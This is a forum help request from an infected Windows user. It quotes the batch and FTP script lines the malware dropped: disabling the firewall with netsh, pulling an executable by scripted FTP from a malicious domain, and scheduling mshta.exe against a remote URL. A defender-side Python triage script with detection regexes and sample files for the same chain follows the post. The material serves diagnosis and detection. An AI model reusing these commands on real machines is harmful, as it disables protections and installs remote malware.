First post so hi all! I'm having some trouble with a nasty infection I picked up somehow. So far I've run Malwarebytes Anti-Malware and AVG to remove the bulk of the problem. But there's still something there that AVG picks up but can only deal with the symptom, not the cause.
At what looks like scheduled times, a batch file is created with a random name like hjBk8WI.bat in c:\. The contents of this file are:
netsh firewall set opmode disable
ftp -s:c:\MaJcwy.txt zaebalisuki.com <--- other known malware domains are used as well as this one.
Looking at the MaJcwy.txt script that it gets the FTP instructions from, it downloads an executable:
get calc.exe c:\eYVJcEi.exe
Another batch file is created at the same time, again with a random name, but this one contains a schedule to run mshta.exe:
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
at 00:22 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
The batch file is much bigger; this is just the first few lines of it.
When the executable file that was FTP'd in is run, AVG picks it up and flags cmd.exe as a possible culprit. I've blocked port 21 to prevent it from making an FTP connection out to get this executable, but none of the scanners I have can pick up the culprit for all of this. Any help much appreciated!
Edited by garmanma, 16 June 2009 - 07:53 AM.
Disabled links to be on the safe side
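A defender-side triage script for the chain described in the post above: it scans the text of dropped batch files and FTP scripts for the three behaviours quoted (netsh disabling the firewall, scripted FTP pulling down an .exe, recurring at-jobs launching mshta.exe against a URL) and reports whether the whole chain is present. This is an added example, not the poster's files or any scanner's own logic; the sample file names and hostnames are constructed.

```python
"""Triage helper for the infection chain described in the post: added example,
not the poster's own files. It scans batch/FTP script text for the behaviours
quoted above (netsh disabling the firewall, scripted FTP fetching an .exe,
recurring 'at' jobs launching mshta.exe against a URL). Sample inputs and
the hostnames in them are constructed; nothing here contacts the network."""
import re

# (indicator name, regex applied to each line, case-insensitive)
INDICATORS = [
    ("firewall_disabled", re.compile(r"^\s*netsh\s+firewall\s+set\s+opmode\s+disable\b", re.I)),
    ("scripted_ftp", re.compile(r"^\s*ftp\b.*\s-s:\S+", re.I)),
    ("at_jobs_wiped", re.compile(r"^\s*at\s+/delete\s+/yes\b", re.I)),
    ("at_job_mshta_url", re.compile(
        r"^\s*at\s+\d{1,2}:\d{2}\s+/every:\S+\s+mshta(\.exe)?\s+https?:/+", re.I)),
    ("ftp_get_exe", re.compile(r"^\s*get\s+\S+\s+\S+\.exe\s*$", re.I)),
]

def scan_script(text):
    """Return [(line_no, indicator, stripped_line)] for every matching line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.append((n, name, line.strip()))
    return hits

def triage(scripts):
    """scripts: {path: text}. Returns {indicator: [(path, line_no), ...]}."""
    summary = {}
    for path, text in scripts.items():
        for n, name, _ in scan_script(text):
            summary.setdefault(name, []).append((path, n))
    return summary

def matches_post_chain(summary):
    """True when all three stages from the post are present on the host:
    firewall opened, .exe pulled by scripted FTP, mshta at-job installed."""
    return all(k in summary for k in ("firewall_disabled", "ftp_get_exe", "at_job_mshta_url"))

# Constructed sample files modelled on the fragments quoted in the post.
SAMPLE_SCRIPTS = {
    r"c:\hjBk8WI.bat": "netsh firewall set opmode disable\n"
                       "ftp -s:c:\\MaJcwy.txt ftp.example.invalid\n",
    r"c:\MaJcwy.txt": "get calc.exe c:\\eYVJcEi.exe\n",
    r"c:\aB3kQz.bat": "sc config Schedule start= auto\nnet start Schedule\n"
                      "at /delete /yes\n"
                      "at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http://example.invalid/33t.php\n",
}
```

Run `triage()` over the text of any short, randomly named .bat or .txt files found in the drive root; the per-line hits tell you which dropped file holds which stage, which is the piece the scanners in the post were not reporting.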